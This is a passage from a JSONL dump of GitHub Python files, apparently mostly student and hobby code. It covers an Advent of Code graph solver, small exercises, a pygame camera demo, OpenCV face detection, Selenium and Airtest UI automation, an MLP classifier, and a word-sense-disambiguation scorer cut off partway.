indexed by node: vector of nodes forming edges\n\n\ndef print_graph(graph: List[List[int]], idx_to_name: List[str]) -> None:\n for x, vec in enumerate(graph):\n for y in vec:\n print(f\"{idx_to_name[x]}-{idx_to_name[y]} ({x}-{y})\")\n\n\ndef print_path(path: List[int]):\n print(\",\".join([idx_to_name[x] for x in path]))\n\n\ndef calc_num_paths_part1(node: int) -> int:\n num_paths = 0\n if node == 1: # end node\n return 1\n if not remaining_visits[node]:\n return 0\n remaining_visits[node] -= 1\n for next_node in graph[node]:\n num_paths += calc_num_paths_part1(next_node)\n remaining_visits[node] += 1 # passed by reference / global, so roll-back\n return num_paths\n\n\ndef calc_num_paths_part2(node: int, path: List[int] = []) -> int:\n # Path is added in order to be able to print all paths\n num_paths = 0\n path = path + [node]\n if node == 1: # end node\n # print_path(path)\n return 1\n if not remaining_visits[node]:\n return 0\n # only one node can be visited twice.\n # So if at least one node got no remaining_visits, the rest are bounded by 1\n if remaining_visits[node] == 1 and any([x == 0 for x in remaining_visits]):\n return 0\n remaining_visits[node] -= 1\n for next_node in graph[node]:\n if next_node != 0: # not start node\n num_paths += calc_num_paths_part2(next_node, path)\n remaining_visits[node] += 1 # passed by reference / global, so roll-back\n return num_paths\n\n\nwith open(\"data.txt\") as f:\n node_names: Dict[str, int] = {}\n node_names[\"start\"] = 0\n\n def update_node(node: str) -> int:\n x = node_names.get(node, len(idx_to_name))\n node_names[node] = x\n assert x <= len(idx_to_name)\n if x == len(idx_to_name):\n idx_to_name.append(node)\n remaining_visits.append(1 if node[0].islower() else 1000000)\n return x\n\n update_node(\"start\")\n update_node(\"end\")\n graph = [[], []]\n for line in f:\n nodeA, nodeB = line.strip().split(\"-\")\n x = update_node(nodeA)\n y = update_node(nodeB)\n\n def update_edge(x: int, y: int) -> None:\n assert x <= len(graph)\n if x == len(graph):\n graph.append([y])\n else:\n if not y in graph[x]:\n graph[x].append(y)\n\n update_edge(x, y)\n update_edge(y, x)\n\n# print_graph(graph, idx_to_name)\nnum_paths = calc_num_paths_part1(0) # 0 = start node\nprint(\"Paths:\", num_paths)\n\n################################\n# PART 2\nprint(\"PART 2\")\nremaining_visits = [\n 2 if x == 1 else x for x in remaining_visits\n] # we now can have two visits for small caves\nremaining_visits[0] = 1000000 # start node\nnum_paths = calc_num_paths_part2(0, []) # 0 = start node\nprint(\"Paths:\", num_paths)\n","repo_name":"kobyv/AdventOfCode","sub_path":"2021/day12/ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"5094983195","text":"#wapp to find factorial of a given no.\n\nnum = int(input(\"Enter a number \"))\nif num < 0:\n\tprint(\"b +ve\")\nelse:\n\tfact = 1\n\tfor i in range(1,num+1):\n\t\tfact = fact*i\n\tprint(\"Fact= \",fact)\n","repo_name":"chicken-biryani/PythonPrograms","sub_path":"L2/prac9.py","file_name":"prac9.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34695958468","text":"#遍历字典键值对\r\nusr_0 = {\r\n '1':'maomao',\r\n '2':'taotao',\r\n '3':'sansan',\r\n}\r\n\r\nfor key , value in usr_0.items():\r\n print(\"\\nKey: \" + key)\r\n print(\"Value: \" + value)\r\n#遍历字典键\r\nfor name in usr_0.keys():\r\n print (\"\\n name: \" + name.title())\r\n#遍历字典值\r\nfor name in usr_0.values():\r\n print (\"\\n name: \" + name.title())","repo_name":"liumeiping6911/python_learning","sub_path":"Task3/1.字典/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"43953152229","text":"# arm.py\n# ---------------\n# Licensing Information: You are free to use or extend this projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to the University of Illinois at Urbana-Champaign\n# \n# Created by Jongdeog Lee (jlee700@illinois.edu) on 09/12/2018\n\n\"\"\"\nThis file contains the Arm class\n\"\"\"\n\nfrom const import *\nfrom armLink import ArmLink\n\nclass Arm:\n def __init__(self, armBasePos, armLinkSpec):\n\n if len(armLinkSpec) > MAX_NUM_OF_ART_LINKS:\n print(\"Maximum number of arm links is %d\" % (MAX_NUM_OF_ART_LINKS))\n raise SystemExit\n\n self.__armLinks = []\n self.__armRelativeAngle = []\n self.__armLimit = []\n\n base = armBasePos\n totalRelativeAngle = 0\n for i in range(len(armLinkSpec)):\n length, relativeAngle, distance, limit = armLinkSpec[i]\n if relativeAngle < min(limit) or relativeAngle > max(limit):\n print(\"The given relativeAngle is not in available range. Set to minimum.\")\n relativeAngle = min(limit)\n self.__armLimit.append(limit)\n self.__armRelativeAngle.append(relativeAngle)\n totalRelativeAngle += relativeAngle\n armLink = ArmLink(base, length, totalRelativeAngle % 360, distance)\n self.__armLinks.append(armLink)\n base = armLink.getEnd() \n\n\n def getBase(self):\n \"\"\"This function returns (x, y) of the arm base\n \"\"\"\n return self.__armLinks[0].getBase()\n\n def getEnd(self):\n \"\"\"This function returns (x, y) of the arm tip\n \"\"\"\n return self.__armLinks[-1].getEnd()\n\n def getArmPos(self):\n \"\"\"This function returns (start, end) of all arm links\n For example, if there are two arm links, the return value would be '\n [ [(x1, y1), (x2, y2)], \n [(x2, y2), (x3, y3)] ]\n \"\"\"\n info = []\n for armLink in self.__armLinks:\n info.append((armLink.getBase(), armLink.getEnd()))\n return info\n \n def getArmPosDist(self):\n \"\"\"This function returns (start, end) of all arm links with the padding distance of the arm\n For example, if there are two arm links, the return value would be '\n [ [(x1, y1), (x2, y2), distance], \n [(x2, y2), (x3, y3), distance] ]\n \"\"\"\n info = [(armLink.getBase(), armLink.getEnd(), armLink.getDistance()) for armLink in self.__armLinks]\n return info\n\n def getArmAngle(self):\n \"\"\"This function returns relative angles of all arm links.\n If there are two arm links, the return value would be (alpha, beta) \n \"\"\"\n return self.__armRelativeAngle\n\n def getArmLimit(self): \n \"\"\"This function returns (min angle, max angle) of all arm links\n \"\"\"\n return self.__armLimit\n\n def getNumArmLinks(self):\n \"\"\"This function returns the number of arm links of this arm\n \"\"\"\n return len(self.__armLinks)\n\n def setArmAngle(self, angles): \n \"\"\"This function sets angles(alpha, beta, gamma) for all arm links\n \"\"\"\n angles = angles[:self.getNumArmLinks()]\n\n for i in range(len(angles)):\n if angles[i] < min(self.__armLimit[i]) or angles[i] > max(self.__armLimit[i]):\n return False\n\n self.__armRelativeAngle = angles\n totalAngle = 0\n base = self.getBase()\n for i in range(len(self.__armRelativeAngle)):\n totalAngle += self.__armRelativeAngle[i]\n self.__armLinks[i].setAngle(totalAngle % 360)\n self.__armLinks[i].setBase(base)\n base = self.__armLinks[i].getEnd()\n\n return True\n","repo_name":"adityavgupta/ECE448-CS440","sub_path":"mp2/arm.py","file_name":"arm.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"85"} +{"seq_id":"1445801818","text":"from pathlib import Path\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams\n\n\nfontsize = 13\nrcParams['font.family'] = 'serif'\nrcParams['font.sans-serif'] = ['Times New Roman']\nrcParams['font.size'] = fontsize\nrcParams['mathtext.fontset'] = 'stix'\nrcParams['axes.titlesize'] = fontsize\nrcParams['axes.labelsize'] = fontsize\nrcParams['text.usetex'] = True\nrcParams[\"savefig.dpi\"] = 150\n\nall_results_dir = Path('paper_plots/results')\nresults_subdirs = ['bc-gail-gan', 'bc-gail', 'bc-gan', 'rgb']\nresults_labels = {'bc-gail-gan': 'hGAIL', 'bc-gail': 'GAIL w/ real BEV', 'bc-gan': 'BC', 'rgb': 'GAIL from cam'} # \nresults_types = ['eval_episodes', 'eval_route_completed', 'rollout_episodes']\ncolumns_names = ['eval_town2/completed_n_episodes', 'eval_town2/is_route_completed', 'rollout/completed_n_episodes']\ncolumns_labels = {'eval_town2/completed_n_episodes': 'infractions', 'eval_town2/is_route_completed': 'completed', 'rollout/completed_n_episodes': 'infractions'}\nfor result_type, column_name in zip(results_types, columns_names):\n for results_subdir in results_subdirs:\n print(results_subdir)\n print(result_type)\n results_len = 3\n if results_subdir == 'bc-gan' and not result_type in ['eval_episodes', 'eval_route_completed']:\n continue\n if results_subdir == 'rgb' and not result_type in ['rollout_episodes']:\n continue\n results_dfs = []\n for i_result in range(results_len):\n results_dir = all_results_dir / f'{results_subdir}-{i_result}'\n results_file = results_dir / f'{result_type}.csv'\n results_df = pd.read_csv(results_file)\n results_dfs.append(results_df)\n \n min_length = None\n for i_result in range(results_len):\n steps_list = results_dfs[i_result]['Step'].tolist()\n if min_length is None:\n min_length = len(steps_list)\n else:\n min_length = min(len(steps_list), min_length)\n print(min_length)\n \n results_lists = []\n for i_result in range(results_len):\n steps_list = results_dfs[i_result]['Step'] / 100000\n steps_list = steps_list\n steps_list = steps_list[:min_length]\n result_column = results_dfs[i_result][column_name].tolist()\n result_column = result_column[:min_length]\n results_lists.append(result_column)\n\n results_array = np.array(results_lists)\n results_mean = results_array.mean(axis=0)\n results_std = results_array.std(axis=0)\n plt.plot(steps_list, results_mean, label=results_labels[results_subdir])\n plt.fill_between(steps_list, results_mean + results_std, results_mean - results_std, alpha=0.5)\n\n plt.legend(loc='best', shadow=True, fontsize='medium')\n plt.xlabel(r'environment interactions ($ \\times 10^5$)')\n plt.ylabel(columns_labels[column_name])\n plt.savefig(f'{result_type}.png')\n plt.clf()\n\n# results_0 = pd.read_csv(results_files[0])\n# results_1 = pd.read_csv(results_files[1])\n\n# min_size = 420\n# results_list = [results_0, results_1]\n# for results in results_list:\n# min_size = min(min_size, len(results))\n\n# results_arr_list = []\n# for results in results_list:\n# results_arr = results['Value'].to_numpy()\n# results_arr = results_arr[:min_size]\n# results_arr_list.append(results_arr)\n\n# results = np.array(results_arr_list)\n# # results = results.reshape(-1, 3)\n# results_mean = results.mean(axis=0)\n# results_std = results.std(axis=0)\n# results_id = np.arange(results.shape[1]) * 7200 /100000\n\n# plt.plot(results_id, results_mean, label=results_files[4])\n# plt.fill_between(results_id, results_mean + results_std, results_mean - results_std, alpha=0.5)\n\n# results_mean.fill(173.6)\n# plt.plot(results_id, results_mean, label='bc')\n# results_std.fill(137.35516007780703)\n# plt.fill_between(results_id, results_mean + results_std, results_mean - results_std, alpha=0.5)\n\n# plt.xlabel(r'environment interactions ($ \\times 10^5$)')\n# plt.ylabel('Reward')\n# plt.legend(loc='lower right', shadow=True, fontsize='medium')\n# plt.savefig('paper_plots/plots/long_train_reward.png')\n# plt.clf()\n\n# for results_files in results_dataset:\n# results_0 = pd.read_csv(results_files[2])\n# results_1 = pd.read_csv(results_files[3])\n\n# min_size = 420\n# results_list = [results_0, results_1]\n# for results in results_list:\n# min_size = min(min_size, len(results))\n\n# results_arr_list = []\n# for results in results_list:\n# results_arr = results['Value'].to_numpy()\n# results_arr = results_arr[:min_size]\n# results_arr_list.append(results_arr)\n\n# results = np.array(results_arr_list)\n# # results = results.reshape(-1, 3)\n# results_mean = results.mean(axis=0)\n# results_std = results.std(axis=0)\n# results_id = np.arange(results.shape[1]) * 7200 /100000\n\n# plt.plot(results_id, results_mean, label=results_files[4])\n# plt.fill_between(results_id, results_mean + results_std, results_mean - results_std, alpha=0.5)\n\n# plt.xlabel(r'environment interactions ($ \\times 10^5$)')\n# plt.ylabel('Reward')\n# plt.savefig('paper_plots/plots/long_eval_reward.png')","repo_name":"gustavokcouto/hgail","sub_path":"paper_plots/gen_graphs.py","file_name":"gen_graphs.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"32274275300","text":"\"\"\"\n给你一个整数数组 nums ,找到其中最长严格递增子序列的长度。\n输入:nums = [10,9,2,5,3,7,101,18]\n输出:4\n解释:最长递增子序列是 [2,3,7,101],因此长度为 4 。\n\"\"\"\n\"\"\"\n原l长的问题拆分为最后一个元素是否是最长严格递增子序列的\n\"\"\"\nnums=[99,100,101,102,3,4,5] #索引值-1即可\nn=len(nums)\ndp=[1]*(n+1)\ndp[0]=0\nfor i in range(1,n+1):\n for j in range(1,i):\n if nums[j-1]d[len],说明nums[j]可以直接加在所有原子序列后面,因此扩增d。\n而若 存在k st. d[k]a:\n return 0\n else:\n return 1\n if sorted_list[compare_index]==a or \\\n sorted_list[compare_index]>a and sorted_list[compare_index-1]a:\\\n return binary_search(sorted_list[:compare_index],a)\n else:\n return len_list//2+binary_search(sorted_list[compare_index:],a)\n\nif __name__=='__main__':\n d=[]\n for m in nums:\n index=binary_search(d,m)\n if index!=len(d):\n d[index]=m\n else:\n d.append(m)\n print(len(d))","repo_name":"habunnywy/leetcode","sub_path":"leetcode/动态规划_最长子序列.py","file_name":"动态规划_最长子序列.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12007018892","text":"import pygame, sys\nfrom random import randint\n\nclass Tree(pygame.sprite.Sprite):\n def __init__(self, pos, group):\n super().__init__(group)\n self.image = pygame.image.load(\"graphics/tree.png\").convert_alpha()\n self.rect = self.image.get_rect(topleft = pos)\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, pos, group):\n super().__init__(group)\n self.image = pygame.image.load(\"graphics/player.png\").convert_alpha()\n self.rect = self.image.get_rect(center = pos)\n self.direction = pygame.math.Vector2()\n self.speed = 5\n\n def input(self):\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_UP]: self.direction.y = -1\n elif keys[pygame.K_DOWN]: self.direction.y = 1\n else: self.direction.y = 0\n\n if keys[pygame.K_RIGHT]: self.direction.x = 1\n elif keys[pygame.K_LEFT]: self.direction.x = -1\n else: self.direction.x = 0\n\n def update(self):\n self.input()\n self.rect.center += self.direction * self.speed\n\nclass CameraGroup(pygame.sprite.Group):\n def __init__(self):\n super().__init__()\n self.display_surface = pygame.display.get_surface() # get the screen\n self.ground_surf = pygame.image.load(\"graphics/ground.png\").convert_alpha()\n self.ground_rect = self.ground_surf.get_rect(topleft=(0, 0))\n\n def custom_draw(self):\n # ground\n self.display_surface.blit(self.ground_surf, self.ground_rect)\n\n # elements on the ground\n for sprite in sorted(self.sprites(), key = lambda sprite: sprite.rect.centery): # the player and all trees\n self.display_surface.blit(sprite.image, sprite.rect)\n\n\npygame.init()\nscreen = pygame.display.set_mode((1280, 720))\nclock = pygame.time.Clock()\n\n# setup\ncamera_group = CameraGroup()\nPlayer((640, 360), camera_group)\n\nfor i in range(20):\n random_x = randint(0, 1000)\n random_y = randint(0, 1000)\n Tree((random_x, random_y), camera_group)\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n screen.fill(\"#71ddee\")\n\n camera_group.update()\n camera_group.draw(screen)\n camera_group.custom_draw()\n\n pygame.display.update()\n clock.tick(60)\n\n\n","repo_name":"lendoo73/FreeCodeCamp","sub_path":"Pygame/Cameras_in_Pygame/y_sort_camera.py","file_name":"y_sort_camera.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"2804679531","text":"# -*- coding: utf-8 -*-\nimport pickle\ntc = {}\nt = {}\nc = {}\nwith open('82.txt','r') as f,open('83.pickle','wb') as g:\n cnt = 0\n for line in f:\n word = tuple(line[:-1].split('\\t'))\n if word[0] in t.keys():\n t[word[0]] += 1\n else:\n t.update({word[0]:1})\n if word[1] in c.keys():\n c[word[1]] += 1\n else:\n c.update({word[1]:1})\n if word in tc.keys():\n tc[word] += 1\n else:\n tc.update({word:1})\n cnt += 1\n res = [cnt,tc,t,c]\n pickle.dump(res,g)\n\n","repo_name":"yryota/nlp100","sub_path":"chap9/nlp_83.py","file_name":"nlp_83.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"20996019903","text":"import numpy as np\r\nimport cv2\r\n\r\ndir = \"Intro_OpenCV/tratamiento_imagenes/detector_objetos/\"\r\n# Cargamos el archivo xml del detector seleccionado\r\nface_classifier = cv2.CascadeClassifier(\r\n dir + \"Haarcascades/haarcascade_frontalface_default.xml\"\r\n)\r\neye_classifier = cv2.CascadeClassifier(dir + \"Haarcascades/haarcascade_eye.xml\")\r\n\r\n# Leemos la imagen\r\nimagen = cv2.imread(dir + \"3.jpg\")\r\n\r\n# Convertimos la imagen a escala de grises\r\ngray = cv2.cvtColor(imagen, cv2.COLOR_BGR2GRAY)\r\n\r\n# El clasificador retorna el ROI de la cara detectada como un tupla de valores\r\n# Esta está compuesta por la coordenada superior izquierda y la inferior derecha\r\nfaces = face_classifier.detectMultiScale(gray, 1.3, 5)\r\n\r\n# Cuando no detecta caras o rostros, el clasificador returna una tupla vacía\r\nif faces is ():\r\n print(\"No se encontraron rostros\")\r\n\r\n# Se itera a través del array de rostros detectados y se dibuja\r\n# un rectángulo sobre cada una de ellas\r\nfor x, y, w, h in faces:\r\n cv2.rectangle(imagen, (x, y), (x + w, y + h), (127, 0, 255), 2)\r\n cv2.imshow(\"Deteccion de Rostros\", imagen)\r\n\r\n# Se itera a través del array de ojos detectados y se dibuja\r\n# un rectángulo sobre cada una de ellos\r\neyes = eye_classifier.detectMultiScale(gray)\r\nfor ex, ey, ew, eh in eyes:\r\n cv2.rectangle(imagen, (ex, ey), (ex + ew, ey + eh), (255, 255, 0), 2)\r\n cv2.imshow(\"Deteccion de Rostro y Ojos\", imagen)\r\n\r\n# Cuando no detecta ojos, el clasificador returna una tupla vacía\r\nif eyes is ():\r\n print(\"No se encontraron ojos\")\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","repo_name":"jcorredorc/ia-movil-robot-agro","sub_path":"Intro_OpenCV/tratamiento_imagenes/detector_objetos/3_DetectorRostroyOjos.py","file_name":"3_DetectorRostroyOjos.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"13015540409","text":"import json\nfrom glob import glob\nfrom typing import List\n\nfiles = glob(\"ChineseLyrics/*json\")\n\ndocs = []\nfor file in files:\n with open(file, encoding=\"utf8\") as rf:\n data = json.load(rf)\n for doc in data:\n # 将歌词的文本列表转换成一个字符串\n doc[\"lyric2\"] = \"\\n\".join(doc[\"lyric\"])\n docs.extend(data)\n\nprint(len(docs)) # 102198 \n\ndef search(keyword: str, docs: List[dict]) -> List[dict]:\n ret = []\n\n for index, doc in enumerate(docs):\n lyric = doc[\"lyric2\"]\n # 统计歌词中关键词出现的次数\n count = lyric.count(keyword)\n if count > 1:\n ret.append({\n \"doc\": doc,\n \"index\": index,\n \"count\": count\n })\n return ret\n\nret = search(\"梦想\", docs)\n\nprint(len(ret)) # 2235\n\n# 通过歌词中关键字出现的次数排序\nret2 = sorted(ret, key=lambda x:x[\"count\"], reverse=True)\n\nprint(ret2[0])","repo_name":"youerning/blog","sub_path":"search_engine/search1.py","file_name":"search1.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":182,"dataset":"github-code","pt":"85"} +{"seq_id":"31920432534","text":"from selenium import webdriver\n\nif __name__ == '__main__':\n\n # Chrome WebDriver 로 chrome.exe 실행\n browser = webdriver.Chrome('./chromedriver.exe')\n\n # 사이트 호출\n browser.implicitly_wait(10)\n browser.get(\"https://v4.map.naver.com\")\n\n # 안내메시지 끄기\n serachbutton = browser.find_element_by_xpath('//*[@id=\"dday_popup\"]/div[2]/button')\n serachbutton.click()\n\n # 검색창에 검색어 입력후 엔터\n serachstring = browser.find_element_by_id(\"search-input\")\n serachstring.send_keys('치킨')\n # serachstring.send_keys(Keys.RETURN)\n\n # 검색 버튼 클릭\n search_button = browser.find_element_by_css_selector(\"button.spm\")\n search_button.click()\n\n # 페이지 읽기\n # print(browser.page_source)\n\n # 드라이브 종료\n browser.quit()","repo_name":"ImDaeseong/Selenium_test","sub_path":"python/navermap.py","file_name":"navermap.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14716201352","text":"# -*- encoding=utf8 -*-\n__author__ = \"chenwt\"\nfrom dch_common import config\nfrom airtest.core.api import *\nfrom poco.drivers.android.uiautomation import AndroidUiautomationPoco\ntry:\n poco = AndroidUiautomationPoco(use_airtest_input=True, screenshot_each_action=False)\nexcept IndexError as e:\n with open(\"D:\\\\apache-tomcat-8.5.33\\\\webapps\\\\DCH_Report\\\\log.txt\",'r+') as f:\n f.truncate()\n f.close()\n print(\"可能未连接到设备,请检查是否连接:\",e)\n\nauto_setup(__file__)\n\nconfig.setup()\nstart_app(\"com.iris.dch.itask\")\nsleep(5)\ntxt1 = ''\ntry:\n txt1 = poco(\"com.iris.dch.itask:id/btn_login\").get_text()\nexcept BaseException as e:\n txt = ''\n print (u'未获取到元素:',e)\nif txt1 == '登录':\n poco(\"com.iris.dch.itask:id/et_login_user\").click()\n #text(\"auto_test\")\n text(config.get_dch_config('itask_username'))\n poco(\"com.iris.dch.itask:id/et_login_psw\").set_text(config.get_dch_config('itask_password'))\n #text(\"111111\")\n #不同手机要用set_text 和 text() 两个方法来实现,坑爹啊\n #text(config.login_pwd())\n keyevent(\"Enter\")\n poco(\"com.iris.dch.itask:id/btn_login\").click()\n sleep(3)\n txt2 = poco(text=\"时间\").get_text()\n assert_equal(txt2,'时间','登录成功')\n\nelse:\n poco(\"com.iris.dch.itask:id/im_circle\").click()\n poco(\"com.iris.dch.itask:id/tv_menu_tuichu\").click()\n poco(\"com.iris.dch.itask:id/et_login_user\").click()\n #text(\"auto_test\")\n text(config.get_dch_config('itask_username'))\n poco(\"com.iris.dch.itask:id/et_login_psw\").set_text(config.get_dch_config('itask_password'))\n #text(\"111111\")\n #text(config.login_pwd())\n keyevent(\"Enter\")\n poco(\"com.iris.dch.itask:id/btn_login\").click()\n sleep(3)\n txt2 = poco(text=\"时间\").get_text()\n assert_equal(txt2,'时间','登录成功')\n\n\n\n\n\n\n\n\n\n","repo_name":"shmily-cwt/DCH_ITASK","sub_path":"test_dch_login.air/test_dch_login.py","file_name":"test_dch_login.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"85"} +{"seq_id":"27739102078","text":"# mlp.py\n# -------------\n\n# mlp implementation\nimport util\nimport numpy as np\n\nPRINT = True\n\n\nclass MLPClassifier:\n \"\"\"\n mlp classifier\n \"\"\"\n\n def __init__(self, legalLabels, max_iterations):\n self.legalLabels = legalLabels\n self.type = \"mlp\"\n self.max_iterations = max_iterations\n\n def sigmoid(self, x, d):\n if (d == True):\n return x * (1 - x)\n return 1 / (1 + np.exp(-x))\n\n def train(self, trainingData, trainingLabels, validationData, validationLabels):\n tData = []\n vData = []\n tLabels = np.zeros((len(trainingLabels), 10))\n\n # Converting the training and validation data to the input format\n for i in range(len(trainingData)):\n sample = trainingData[i].items()\n if i < len(validationData):\n validation = validationData[i].items()\n\n temp1 = []\n temp2 = []\n tLabels[i][trainingLabels[i]] = 1\n for j in range(len(sample)):\n # Only appending the feature at that point\n # Number of features should be the same for all training samples\n temp1.append(sample[j][1])\n if i < len(validationData):\n temp2.append(validation[j][1])\n sample = np.asarray(temp1)\n sample = sample.flatten()\n tData.append(sample)\n if i < len(validationData):\n validation = np.asarray(temp2)\n validation = validation.flatten()\n vData.append(validation)\n tData = np.asarray(tData)\n\n k = 150\n # 150 works decent for digits\n features = len(tData[0])\n self.l0 = np.random.random((features, k)) - 0.5\n self.l1 = np.random.random((k, 10)) - 0.5\n wl0 = self.l0\n wl1 = self.l1\n learning = 0.02\n\n for iteration in range(self.max_iterations):\n print (\"Starting iteration \", iteration, \"...\")\n for i in range(len(trainingData)):\n # Forward propagation\n l0 = tData[i]\n l0 = l0.reshape(1, -1)\n\n l1 = self.sigmoid(np.dot(l0, wl0), False)\n l2 = self.sigmoid(np.dot(l1, wl1), False)\n # print l0.shape, l1.shape, l2.shape\n\n # Compute output error value\n # print \"Computing error values...\"\n output_error = np.subtract(tLabels[i], l2)\n delta2 = np.multiply(output_error, self.sigmoid(l2, True))\n # print output_error.shape, delta2.shape\n delta2 = delta2 * learning\n\n # Backward propagation\n # print \"Backwards propagating...\"\n hidden_error = delta2.dot(np.transpose(wl1))\n delta1 = hidden_error * self.sigmoid(l1, True)\n # print hidden_error.shape, delta1.shape\n delta1 = delta1 * learning\n\n # Update weights\n # print \"Updating weights...\"\n # print l0.shape, delta1.shape\n # print l1.shape, delta2.shape\n wl0 += np.transpose(l0).dot(delta1)\n wl1 += np.transpose(l1).dot(delta2)\n\n self.l0 = wl0\n self.l1 = wl1\n\n def classify(self, data):\n guesses = []\n l2s = []\n # print self.l1\n # print self.l0\n for datum in data:\n datum = datum.items()\n temp1 = []\n for j in range(len(datum)):\n # Only appending the feature at that point\n # Number of features should be the same for all training samples\n temp1.append(datum[j][1])\n sample = np.asarray(temp1)\n sample = sample.flatten()\n\n # Predicting\n l0 = sample # np.asarray([sum(temp1)])\n l1 = self.sigmoid(np.dot(l0, self.l0), False)\n l2 = self.sigmoid(np.dot(l1, self.l1), False)\n # print(l0)\n # print(l1)\n # print(l2)\n # print(np.argmax(l2))\n # exit()\n output = np.argmax(l2)\n l2s.append(l2)\n guesses.append(output)\n return guesses\n","repo_name":"fatimaalsaadeh/Artificial-Intelligence","sub_path":"classification_project/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"18196001421","text":"__author__ = 'jeffreyquinn'\nimport pylab\n\n\ndef plot_lines(args, labels, out_fn):\n \"\"\"\n Create an overlayed, multicolored plot of multiple sets of cartesian points\n\n :param args: list-like of 2-tuples of X and Y points to plot\n \"\"\"\n lines = []\n for (idx, (xy, label)) in enumerate(zip(args, labels)):\n lines.append(pylab.plot(xy[0], xy[1], label=label))\n\n pylab.legend(loc=2,\n ncol=1, mode=\"expand\", borderaxespad=0.)\n pylab.savefig(out_fn)\n pylab.close()\n","repo_name":"qwwqwwq/audio_analysis","sub_path":"code/py/viz/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"9840875036","text":"#Ausawin Saehaan\r\n#CMSC416\r\n#03/27/2022\r\n#Programming Assignment 4: Word Sense Disambiguation\r\n\r\n#***Purpose***\r\n#This is a separate program from wsd.py, where wsd.py's output is compared with the gold standard \"key\" data, which is named line-key.txt \r\n#The accuracy of the sense tagged output created by wsd.py is calculated here and a confusion matrix is generated as well\r\n\r\n#***How to Use***\r\n#Make sure to download and have all files in the same location (wsd.py, scorer.py, line-test.txt, line-train.txt, line-key.txt)\r\n#Open command prompt (cmd) and change your cmd's directory/location to that of all your files using 'cd'\r\n#Enter the command: python scorer.py my-line-answers.txt line-key.txt \r\n\r\n#***Example Output***\r\n#Overall accuracy of tagging: 95.23809523809523%\r\n#Overall accuracy of baseline sentiment: 57.14285714285714%\r\n#Confusion matrix\r\n\r\n#***Algorithm***\r\n#Read files line-key.txt and my-line-answers.txt as input\r\n#Parse input generated from new files\r\n#Add parsed input into an array/list\r\n#Loop through list and check for matches between the golden standard key and output generated from wsd.py\r\n#If number of matches increase, then accuracy increases; vice versa with decrease in correlation\r\n#Take manipulated inputs and write to confusion matrix\r\n\r\n#Overall accuracy of tagging: 95.23809523809523%\r\n#Overall accuracy of baseline sentiment: 57.14285714285714%\r\n\r\n#Confusion Matrix:\r\n#Actual phone product All\r\n#Prediction\r\n#phone 68 4 72\r\n#product 3 52 55\r\n#All 71 56 127\r\n\r\nfrom sys import argv\r\nimport re\r\nimport pandas as pd\r\n\r\n#system commands called in cmd\r\nargv[1] = \"my-line-answers.txt\"\r\nargv[2] = \"line-key.txt\"\r\n\r\n#read in sense tagged output and gold standard \"key\" data\r\nf = open(argv[1], \"r\")\r\ng = open(argv[2], \"r\")\r\nfileMyAnswers = f.read()\r\nfileKey = g.read()\r\n\r\ni = re.split(r'\\n', str(fileMyAnswers))\r\nj = re.split(r'\\n', str(fileKey))\r\n\r\n#total amount of answer instances\r\nanswerTotal = 126\r\n\r\n#use set intersection to get common answers between both lists \r\nanswerCorrect = list(set(i) & set(j))\r\n\r\n#correct answers / total answers x 100 for a percentage\r\naccuracy = len(answerCorrect)/answerTotal * 100\r\n\r\n#most frequent sense baseline\r\nbaselinePhone = re.findall(r'senseid=(\"phone\")', str(fileKey))\r\nanswerBaseline = len(baselinePhone)/ answerTotal * 100 \r\n\r\n#lists that will take input phone and product for confusion matrix\r\nsensePredicted = []\r\nsenseActual = []\r\n\r\n#appends correct and incorrect sentiments for matrix\r\nindex = 0\r\nfor index in range(len(i)):\r\n #if index in my-sentiment-answers.txt matches index in sentiment-test-key.txt\r\n if i[index] == j[index]:\r\n #if sense is phone for the matching answers of both files, then add phone to actual and prediction lists\r\n matchPhone = re.search(r'senseid=(\"phone\")',j[index])\r\n if matchPhone:\r\n senseActual.append('phone')\r\n sensePredicted.append('phone')\r\n #adds product senseid to both actual and prediction lists\r\n else:\r\n senseActual.append('product')\r\n sensePredicted.append('product')\r\n #if indices don't match and the sense is product, adds phone to actual list but PRODUCT to prediction list\r\n else:\r\n matchProduct = 